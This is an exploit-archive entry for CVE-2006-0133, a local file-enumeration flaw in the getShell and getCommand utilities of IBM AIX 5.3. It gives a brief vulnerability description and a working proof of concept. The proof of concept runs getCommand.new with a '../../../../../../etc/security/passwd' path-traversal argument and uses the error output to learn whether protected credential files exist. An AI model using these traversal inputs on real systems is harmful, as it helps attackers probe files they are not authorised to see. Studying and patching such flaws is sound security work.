IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration
| EKU-ID: 32299 | CVE: CVE-2006-0133;OSVDB-22422 | OSVDB-ID: |
| Author: xfocus | Published: 2005-12-30 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 32299 | CVE: CVE-2006-0133;OSVDB-22422 | OSVDB-ID: |
| Author: xfocus | Published: 2005-12-30 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/16102/info IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see. -bash-3.00$./getCommand.new ../../../../../../etc/security/passwd -bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa fopen: No such file or directory